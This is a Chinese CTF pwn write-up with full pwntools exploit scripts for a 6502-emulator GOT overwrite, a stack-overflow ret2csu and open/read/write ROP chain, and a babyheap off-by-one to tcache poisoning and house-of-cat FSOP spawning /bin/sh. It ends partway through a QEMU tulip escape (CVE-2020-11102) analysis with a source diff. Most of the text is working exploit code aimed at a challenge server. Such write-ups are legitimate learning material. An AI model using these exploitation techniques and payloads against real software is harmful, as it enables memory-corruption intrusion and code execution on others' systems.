mem_ptr[a1 - 0xFBFA] = a2;
}
else
{
mem_ptr[a1] = a2;
}
}
else
{
mem_ptr[a1] = a2;
}
return 0LL;
}
  • 注意 (__int16)(a1 - 512) 这段伪代码,这里有一个强制类型转换

虽然 IDA 分析 a1 是 unsigned __int16,但从汇编指令来看可以分析出问题:

1
2
3
4
5
6
7
.text:00000000000059E4 48 8B 15 0D 67 20 00          mov     rdx, cs:mem_ptr
.text:00000000000059EB 0F B7 45 FC movzx eax, [rbp+var_4]
.text:00000000000059EF 66 2D 00 02 sub ax, 200h
.text:00000000000059F3 98 cwde
.text:00000000000059F4 48 98 cdqe
.text:00000000000059F6 0F B6 4D F8 movzx ecx, [rbp+var_8]
.text:00000000000059FA 88 8C 02 06 02 00 00 mov [rdx+rax+206h], cl
  • 实现强制类型转换的汇编代码为:cwde cdqe(符号扩展)
  • 因此 a1 应该是16位的有符号数

同样的漏洞也出现在 get_mem 中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
// get_mem: read one byte from emulated address `cpu`, using the same address
// mapping as write_mem; prints trace lines to stderr when DEBUG is set.
unsigned __int8 __fastcall get_mem(unsigned __int16 cpu)
{
if ( DEBUG )
fprintf(stderr, "(get_mem) reading at: 0x%X\n", cpu);
if ( cpu <= 0xFFu )
return mem_ptr[cpu];
if ( cpu <= 0x1FFu )
return mem_ptr[cpu];
if ( cpu > 0xFFF9u )
return mem_ptr[cpu - 0xFBFA];
if ( DEBUG )
fprintf(stderr, "(get_mem) parsed: 0x%X\n", (unsigned int)cpu - 512);
// Signed 16-bit reinterpretation: for cpu >= 0x8200 the offset is negative,
// so the read can land before the start of mem_ptr.
return mem_ptr[(__int16)(cpu - 0x200) + 0x206];
}

入侵思路

本题目的核心点就是利用程序实现的 6502 CPU 指令来覆盖 puts_got 为 system

可以先使用 LDX 和 STX 往零页内存(地址 0 和 1)中写入 puts_got 的偏移,再把 regX 置 0,然后用 LDA(IZX 寻址)进行读取,计算步骤如下:

1
2
pwndbg> distance $rebase(0x20A018) 0x559fe1e0c120
0x559fe1e0a018->0x559fe1e0c120 is 0x2108 bytes (0x421 words)
1
2
In [5]: hex(0x10000-0x2108-0x206+0x200)
Out[5]: '0xdef2'

测试样例如下:

1
2
3
4
5
6
7
payload = b''
payload += LDX(0xf2)
payload += STX(0)
payload += LDX(0xde)
payload += STX(1)
payload += LDX(0) # LDX(置空regX)
payload += LDA(0) # LDA(读取puts@got)
1
0x559fe1c05958    movzx  eax, byte ptr [rdx + rax + 0x206] <puts@got.plt>

读取 &puts 的值之后,我们可以使用 ADC 指令将 &puts 加为 &system:

1
2
pwndbg> distance &puts &system
0x7f1686641970->0x7f1686610420 is -0x31550 bytes (-0x62aa words)

最后用同样的方法往 regX 中写入 puts_got 的偏移,接着就可以使用 STA 覆盖 puts_got

每次覆盖1字节,连续执行3次后就可以将 puts 修改为 system

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './6502_proccessor1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

# Short aliases for the tube methods of the global connection `p`
# (p is assigned further down, before any of these is called).
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# Log a variable by name in colour; the escape sequences need the leading "\0".
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Pad a short leak with NUL bytes before unpacking; the fill argument of
# ljust() must be exactly one byte.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./.debug/\n"

# local = 1 runs the binary as a child process, anything else connects remotely.
local = 1
if local:
    p = process(challenge)
    #p = gdb.debug(challenge, b)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach gdb to `p` with a breakpoint at $rebase(0x6919), then pause()."""
    #gdb.attach(p)
    gdb.attach(p,"b *$rebase(0x6919)\n")
    pause()

def cmd(op):
    """Send menu choice `op` once the '>' prompt has been received."""
    sla(">",str(op))

def LDX(data):
    """Encode opcode 0xa2 followed by the one-byte operand `data`."""
    payload = p8(0xa2) + p8(data)
    return payload

def STX(offset):
    """Encode opcode 0x86 followed by the one-byte operand `offset`."""
    payload = p8(0x86) + p8(offset)
    return payload

def LDA(offset):
    """Encode opcode 0xa1 followed by the one-byte operand `offset`."""
    payload = p8(0xa1) + p8(offset)
    return payload

def STA(offset):
    """Encode opcode 0x81 followed by the one-byte operand `offset`."""
    payload = p8(0x81) + p8(offset)
    return payload

def ABC(data):
    """Encode opcode 0x65 followed by the one-byte operand `data` (the write-up uses it as its ADC step)."""
    payload = p8(0x65) + p8(data)
    return payload

"""
In [5]: hex(0x10000-0x2108-0x206+0x200)
Out[5]: '0xdef2'
"""

#debug()
# One round per patched byte: (low byte of the 0xdeXX target address, byte
# added to the value read from it).
rounds = ((0xf2, 0xb0), (0xf3, 0xea), (0xf4, 0xfc))

payload = b''
for ptr_lo, addend in rounds:
    # Store the 16-bit target address in zero-page bytes 0/1 and load 0 into X.
    aim = LDX(ptr_lo) + STX(0) + LDX(0xde) + STX(1) + LDX(0)
    payload += aim + LDA(0)                      # read the current byte
    payload += LDX(addend) + STX(0) + ABC(0)     # add the addend kept in byte 0
    payload += aim + STA(0)                      # write the adjusted byte back

sla("length:",str(len(payload)))
sa("code",payload)
sl("/bin/sh")

p.interactive()

silent

1
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.5) stable release version 2.27.
1
2
3
4
5
6
silent: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=178287750053d8eedf914be6f97e8ab65e812b1b, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,dynamically,Full RELRO,NX
1
2
3
4
5
6
7
8
9
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x06 0xc000003e if (A != ARCH_X86_64) goto 0008
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x03 0xffffffff if (A != 0xffffffff) goto 0008
0005: 0x15 0x02 0x00 0x0000003b if (A == execve) goto 0008
0006: 0x15 0x01 0x00 0x00000142 if (A == execveat) goto 0008
0007: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0008: 0x06 0x00 0x00 0x00000000 return KILL

漏洞分析

栈溢出:

1
2
3
4
5
6
7
8
9
10
11
// main (decompiler output): install the seccomp filter, set a 30-second alarm,
// switch stdin/stdout to mode 2 (presumably _IONBF), then read user input.
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[64]; // [rsp+10h] [rbp-40h] BYREF

init_seccomp();
alarm(0x1Eu);
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
// Reads up to 0x100 bytes into a 64-byte stack buffer: the stack overflow.
read(0, buf, 0x100uLL);
return 0;
}

入侵思路

首先我们需要一个 magic gadget:

1
2
3
4
5
6
➜  pwn2 ROPgadget --binary silent --depth 600 | grep "rbp - 0x3d"
0x0000000000400787 : add byte ptr [rbp - 0x3d], bl ; nop word ptr [rax + rax] ; mov esi, 0x601010 ; push rbp ; sub rsi, 0x601010 ; mov rbp, rsp ; sar rsi, 3 ; mov rax, rsi ; shr rax, 0x3f ; add rsi, rax ; sar rsi, 1 ; je 0x4007c8 ; mov eax, 0 ; test rax, rax ; je 0x4007c8 ; pop rbp ; mov edi, 0x601010 ; jmp rax
0x00000000004007e8 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
0x00000000004007e3 : add eax, 0x20084f ; add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
0x00000000004007e6 : and byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
0x00000000004007e1 : inc esi ; add eax, 0x20084f ; add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret

下面这段 gadget 是通过指令错位得来的:

1
0x00000000004007e8 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
  • [rbp - 0x3d] 中的数据加上 ebx
  • 由于我们可以控制 rbp,因此这段 gadget 实现了 WAA

核心思路就是覆盖 stdout 上遗留的 libc_addr 为 puts,完成泄露以后再覆盖回来写循环

下一次执行 main 就可以写入 ORW 链了

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './silent1'

context.os='linux'
context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.27.so')

# Short aliases for the tube methods of the global connection `p`
# (p is assigned further down, before any of these is called).
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# Log a variable by name in colour; the escape sequences need the leading "\0".
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Pad a short leak with NUL bytes before unpacking; the fill argument of
# ljust() must be exactly one byte.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./.debug/\n"

# local = 1 runs the binary as a child process, anything else connects remotely.
local = 1
if local:
    p = process(challenge)
    #p = gdb.debug(challenge, b)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach gdb to `p` with a breakpoint at 0x4008FD, then pause()."""
    gdb.attach(p,"b *0x4008FD\n")
    #gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
    pause()

def cmd(op):
    """Send menu choice `op` once the '>' prompt has been received."""
    sla(">",str(op))

# Addresses of the two csu gadget halves: the register-loading/call part
# (front) and the pop sequence (end).
csu_front_addr=0x400940
csu_end_addr=0x40095A

def csu(rbx, rbp, r12, r13, r14, r15, last):
    """Build a ret2csu chain and return it as bytes.

    Layout: csu_end_addr, the six popped registers, csu_front_addr,
    0x38 filler bytes, then the final return address `last`.
    """
    # pop rbx,rbp,r12,r13,r14,r15
    # rbx should be 0,
    # rbp should be 1,enable not to jump
    # r12 should be the function we want to call (must be a GOT-entry address)
    # rdx=r15d
    # rsi=r14
    # rdi=r13
    # csu(0, 1, fun_got, rdi, rsi, rdx, last)
    payload = b""
    payload += p64(csu_end_addr)
    payload += p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)
    payload += p64(csu_front_addr)
    payload += b'a' * 0x38
    payload += p64(last)
    return payload

# Fixed addresses inside the non-PIE binary.
magic_addr = 0x4007e8            # add dword ptr [rbp - 0x3d], ebx ; ... ; ret
pop_rbp = 0x400788
libc_start_main_addr = 0x600FF0
stdout = 0x601020
main_addr = 0x400879
start_addr = 0x400720
bss_addr = stdout + 0x200        # scratch area 0x200 bytes past stdout
level_ret = 0x4008FC

# Stage 1: 0x40 bytes fill buf, 8 more cover the saved rbp, then the chain.
payload = b"a"*0x40+b"b"*0x8
# csu_end pops rbx, rbp, r12, r13, r14, r15 in that order.
# rbx = -0x36bdf0 (its low 32 bits are what the magic gadget adds),
# rbp - 0x3d = stdout, and r12 + rbx*8 == stdout because 0x36bdf0*8 == 0x1b5ef80.
payload += p64(csu_end_addr)+p64(0xffffffffffc94210)+p64(stdout+0x3d)+p64(0x1b5ef80+stdout)+p64(libc_start_main_addr)+p64(0)+p64(0)
# add dword ptr [rbp-0x3d], ebx: shifts the libc pointer stored at `stdout`
# (onto puts, according to the write-up).
payload += p64(magic_addr)
# rbp = rbx + 1, presumably so the csu loop exits after a single call.
payload += p64(pop_rbp) + p64(0xffffffffffc94210+1)
# Assuming the usual `call [r12 + rbx*8]`, this calls the patched pointer with
# edi = r13 = libc_start_main_addr, printing that GOT entry.
payload += p64(csu_front_addr)
payload += b'a' * 0x8
# Second pop round: rbx = +0x36bdf0 and rbp - 0x3d = stdout, so the next magic
# gadget adds the delta back and restores the original pointer.
payload += p64(0x36bdf0)
payload += p64(stdout+0x3d)
payload += p64(0)*4
payload += p64(magic_addr)
# Restart the program so a second payload can be read.
payload += p64(start_addr)

success("payload len >> "+hex(len(payload)))
sl(payload)

# The first six bytes received are taken as the leaked libc address.
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
libc_base = leak_addr - 0x21ba0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

# Gadget offsets inside the leaked libc.
pop_rdi_ret = libc_base + 0x000000000002164f
pop_rsi_ret = libc_base + 0x0000000000023a6a
pop_rdx_ret = libc_base + 0x0000000000001b96

open_libc = libc_base + libc.sym["open"]
read_libc = libc_base + libc.sym["read"]
write_libc = libc_base + libc.sym["write"]

# Stage 2: open/read/write chain (execve and execveat are blocked by seccomp).
payload = b"a"*0x40+b"b"*0x8
# read(0, bss_addr, 0x30) -- receives the file name sent at the end
payload += p64(pop_rdi_ret) + p64(0)
payload += p64(pop_rsi_ret) + p64(bss_addr)
payload += p64(pop_rdx_ret) + p64(0x30)
payload += p64(read_libc)
# open(bss_addr, 0) with rdx = 0
payload += p64(pop_rdi_ret) + p64(bss_addr)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(open_libc)
# read(3, <rsi>, 0x50) -- rsi is not reloaded here; the chain relies on
# whatever open() left in it (NOTE(review): presumably still bss_addr)
payload += p64(pop_rdi_ret) + p64(3)
payload += p64(pop_rdx_ret) + p64(0x50)
payload += p64(read_libc)
# write(1, <rsi>, <rdx>) -- rsi and rdx carry over from the read above
payload += p64(pop_rdi_ret) + p64(1)
payload += p64(write_libc)
success("payload len >> "+hex(len(payload)))

#debug()
sleep(1)
sl(payload)

sleep(1)
# File name consumed by the first read() of the chain.
p.send("./flag")

p.interactive()

babyheap

1
GNU C Library (Ubuntu GLIBC 2.38-1ubuntu6) stable release version 2.38.
1
2
3
4
5
6
babyheap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6b74874314aed94f7f0bb37f33a1aace975e2491, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

dele、show、edit 中的 chunk_list 和 size_list 有溢出:

1
2
3
4
5
6
7
8
9
// Excerpt of the delete handler: free the chunk at `index` and clear both
// bookkeeping arrays.  The bound admits index values 0..0x10; the write-up
// identifies this as an overflow of chunk_list/size_list.
if ( index < 0x11 )
{
if ( chunk_list[index] )
{
free(chunk_list[index]);
chunk_list[index] = 0LL;   // pointer cleared after free
size_list[index] = 0;
}
}

有 off-by-one 漏洞:

1
2
3
4
5
6
7
8
// Read up to `size` bytes one at a time, stopping at a newline (0xA).
for ( i = 0; i < size; ++i )
{
read(0, &code, 1uLL);
if ( code == 0xA )
break;
buf[i] = code;
}
// When no newline arrives, i == size here, so the terminator is written one
// byte past the `size` bytes just filled (the off-by-one).
buf[i] = 0;

入侵思路

利用 off-by-one 可以打 unlink attack,进而泄露 heap_base 和 libc_base:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
ru("easier\n")
leak_addr = eval(ru("\n"))
heap_base = leak_addr - 0x2a0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

fake_heap_addr = heap_base + 0x2c0
payload = p64(0)+ p64(0xc61)
payload += p64(fake_heap_addr+0x18)+p64(fake_heap_addr+0x20)
payload += p64(0)+p64(0)
payload += p64(fake_heap_addr)

add(0x428,payload) #0
add(0x428,"a"*0x10) #1
add(0x408,"a"*0x10) #2
add(0x4f8,"a"*0x10) #3
add(0x408,"a"*0x10) #4
add(0x408,"a"*0x10) #5
add(0x408,"a"*0x10) #6

edit(2,0x408,b"b"*0x400+p64(0xc60))

dele(3)
add(0x418,"c"*8)
add(0x428,"c"*8)
add(0x408,"c"*8)
dele(1)
add(0x500,"c"*8)

show(7)
ru("\n")
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
libc_base = leak_addr - 0x1ff0f0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

接下来就可以劫持 tcache,进而劫持 IO_list_all

最后打 house of cat 就可以了(这里需要整理一下堆风水,以便 /bin/sh 的写入)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './babyheap1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

# Short aliases for the tube methods of the global connection `p`
# (p is assigned further down, before any of these is called).
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# Log a variable by name in colour; the escape sequences need the leading "\0".
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Pad a short leak with NUL bytes before unpacking; the fill argument of
# ljust() must be exactly one byte.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./.debug/\n"

# local = 1 runs the binary as a child process, anything else connects remotely.
local = 1
if local:
    p = process(challenge)
    #p = gdb.debug(challenge, b)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach gdb to `p` with a breakpoint at $rebase(0x1729)."""
    #gdb.attach(p,"")
    gdb.attach(p,"b *$rebase(0x1729)\n")
    #pause()

def cmd(op):
    """Send menu choice `op` once the '>>' prompt has been received."""
    sla(">>",str(op))

def add(size,data):
    """Menu entry 1: answer the 'size' prompt with `size` and the 'name' prompt with `data`."""
    cmd(1)
    sla("size",str(size))
    sla("name",data)

def edit(index,size,data):
    """Menu entry 2: answer the 'index', 'size' and 'name' prompts in turn."""
    cmd(2)
    sla("index",str(index))
    sla("size",str(size))
    sla("name",data)

def show(index):
    """Menu entry 3: answer the 'index' prompt with `index`."""
    cmd(3)
    sla("index",str(index))

def dele(index):
    """Menu entry 4: answer the 'index' prompt with `index`."""
    cmd(4)
    sla("index",str(index))

#debug()
# The line after "easier" is parsed as the heap leak.
# NOTE(review): eval() runs on data received from the target; acceptable
# against a known CTF binary, unsafe against an untrusted service.
ru("easier\n")
leak_addr = eval(ru("\n"))
heap_base = leak_addr - 0x2a0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

# Fake chunk written into chunk #0: prev_size 0, size 0xc61, followed by
# pointers derived from fake_heap_addr (presumably the fd/bk pair the unlink
# check inspects, per the write-up's unlink attack).
fake_heap_addr = heap_base + 0x2c0
payload = p64(0)+ p64(0xc61)
payload += p64(fake_heap_addr+0x18)+p64(fake_heap_addr+0x20)
payload += p64(0)+p64(0)
payload += p64(fake_heap_addr)

add(0x428,payload) #0
add(0x428,"a"*0x10) #1
add(0x408,"a"*0x10) #2
add(0x4f8,"a"*0x10) #3
add(0x408,"a"*0x10) #4
add(0x408,"a"*0x10) #5
add(0x408,"a"*0x10) #6

# Fill chunk #2 completely: the final 8 bytes (0xc60) match the fake size
# without its low flag bit, and the off-by-one NUL terminator lands one byte
# past the 0x408 bytes written.
edit(2,0x408,b"b"*0x400+p64(0xc60))

# Free #3, then re-allocate; per the write-up this yields overlapping chunks.
dele(3)
add(0x418,"c"*8)
add(0x428,"c"*8)
add(0x408,"c"*8)
dele(1)
add(0x500,"c"*8)

# After skipping one line, the next six bytes of show(7) are taken as a libc pointer.
show(7)
ru("\n")
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
libc_base = leak_addr - 0x1ff0f0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

dele(4)
dele(5)
dele(2)

io_list_all = libc_base + 0x1ff6a0
# Mask XORed into the forged tcache pointer below (heap address >> 12).
key = (heap_base + 0xb20)>>12
success("io_list_all >> "+hex(io_list_all))
success("key >> "+hex(key))

libc_system = libc_base + libc.sym["system"]
_IO_wfile_jumps = libc_base + libc.sym["_IO_wfile_jumps"]
success("_IO_wfile_jumps >> "+hex(_IO_wfile_jumps))
success("libc_system >> "+hex(libc_system))

next_chain = 0
fake_io_addr = heap_base + 0x2d0 - 0x10
payload_addr = heap_base
flag_addr = heap_base

# Fake FILE object for the "house of cat" technique named in the write-up;
# the ljust() calls place each field at its intended offset.
fake_IO_FILE = b"/bin/sh\x00" #_flags=rdi
fake_IO_FILE += p64(0)*5
fake_IO_FILE += p64(1)+p64(2) # rcx!=0(FSOP)
fake_IO_FILE += p64(payload_addr-0xa0)#_IO_backup_base=rdx
fake_IO_FILE += p64(libc_system)#_IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x58, b'\x00')
fake_IO_FILE += p64(0) # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x78, b'\x00')
fake_IO_FILE += p64(flag_addr) # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0x90, b'\x00')
fake_IO_FILE += p64(fake_io_addr+0x30)#_wide_data,rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xb0, b'\x00')
fake_IO_FILE += p64(1) #mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xc8, b'\x00')
fake_IO_FILE += p64(_IO_wfile_jumps+0x30) # vtable = _IO_wfile_jumps + 0x30
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40) # rax2_addr
# NOTE(review): next_chain is assigned but never used in this listing.

# Overwrite a freed chunk's next pointer with the masked address of
# io_list_all; the second allocation then writes fake_io_addr at that address.
edit(8,0x8,p64(io_list_all ^ key))
add(0x400,"d"*8)
add(0x400,p64(fake_io_addr))

edit(0,8,"/bin/sh\x00")
edit(3,len(fake_IO_FILE),fake_IO_FILE)

# Menu entry 5: presumably exits the program, which walks the FILE list.
cmd(5)

p.interactive()

EscapefromtheEarth 复现

1
2
3
4
5
6
7
8
#!/bin/sh

./qemu-system-x86_64 -L ./dependency -kernel ./vmlinuz-4.15.0-208-generic -initrd ./rootfs.cpio -cpu kvm64,+smep \
-m 64M \
-monitor none \
-device tulip \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-nographic
1
2
3
4
5
6
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
/sbin/mdev -s
insmod /tulip.ko
exec /bin/sh

启动内核发现是 root 权限:

1
2
3
4
/ # whoami
root
/ # id
uid=0(root) gid=0
  • 本题目提供了 qemu-system-x86_64,那极有可能是 qemu 逃逸

漏洞分析

qemu 逃逸一般在如下4个函数中出现 BUG:

  • pmio_read:读设备寄存器的物理地址(使用 in() 触发)
  • pmio_write:写设备寄存器的物理地址(使用 out() 触发)
  • mmio_read:读设备寄存器的虚拟地址(使用 mmap 映射物理内存,读这片区域时触发)
  • mmio_write:写设备寄存器的虚拟地址(使用 mmap 映射物理内存,写这片区域时触发)

但本题目并没有注册 mmio / pmio 的相关函数,题目提供的线索指向 CVE-2020-11102,并提供了 qemu 的编译过程:

1
2
3
4
5
6
wget https://download.qemu.org/qemu-4.2.0.tar.xz
xz -d ./qemu-4.2.0.tar.xz
tar -xvf ./qemu-4.2.0.tar
cp ./tulip.c ./qemu-4.2.0/hw/net/
#Then build qemu as normal
...
  • QEMU 4.2.0 版本中的 hw/net/tulip.c 文件存在缓冲区错误漏洞
  • 攻击者可利用该漏洞造成 QEMU 进程崩溃或可能以 QEMU 进程权限执行任意代码

于是我们去下载 QEMU 4.2.1 的源码,用 diff 判断一下程序修改了哪里:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
--- tulip.c	2023-03-29 14:50:12.000000000 +0800
+++ tulip2.c 2020-06-26 02:12:17.000000000 +0800
@@ -38,9 +38,9 @@

uint8_t rx_frame[2048];
uint8_t tx_frame[2048];
- int tx_frame_len;
- int rx_frame_len;
- int rx_frame_size;
+ uint16_t tx_frame_len;
+ uint16_t rx_frame_len;
+ uint16_t rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
@@ -58,9 +58,9 @@
VMSTATE_UINT64(current_tx_desc, TULIPState),
VMSTATE_BUFFER(rx_frame, TULIPState),
VMSTATE_BUFFER(tx_frame, TULIPState),
- VMSTATE_INT32(rx_frame_len, TULIPState),
- VMSTATE_INT32(tx_frame_len, TULIPState),
- VMSTATE_INT32(rx_frame_size, TULIPState),
+ VMSTATE_UINT16(rx_frame_len, TULIPState),
+ VMSTATE_UINT16(tx_frame_len, TULIPState),
+ VMSTATE_UINT16(rx_frame_size, TULIPState),
VMSTATE_UINT32(rx_status, TULIPState),
VMSTATE_UINT8_2DARRAY(filter, TULIPState, 16, 6),
VMSTATE_END_OF_LIST()
@@ -170,6 +170,7 @@
} else {
len = s->rx_frame_len;
}
+
pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
@@ -181,6 +182,7 @@
} else {
len = s->rx_frame_len;
}
+
pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
@@ -227,7 +229,8 @@

trace_tulip_receive(buf, size);

- if (size < 14 || size > 2048 || tulip_rx_stopped(s)) {
+ if (size < 14 || size > sizeof(s->rx_frame) - 4
+ || s->rx_frame_len || tulip_rx_stopped(s)) {
return 0;
}

@@ -275,7 +278,6 @@
return tulip_receive(qemu_get_nic_opaque(nc), buf, size);
}

-
static NetClientInfo net_tulip_info = {
.type = NET_CLIENT_DRIVER_NIC,
.size = sizeof(NICState),
@@ -558,7 +560,7 @@
if ((s->csr[6] >> CSR6_OM_SHIFT) & CSR6_OM_MASK) {
/* Internal or external Loopback */
tulip_receive(s, s->tx_frame, s->tx_frame_len);
- } else {
+ } else if (s->tx_frame_len <= sizeof(s->tx_frame)) {
qemu_send_packet(qemu_get_queue(s->nic),
s->tx_frame, s->tx_frame_len);
}
@@ -570,23 +572,31 @@
}
}

-static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
+static int tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
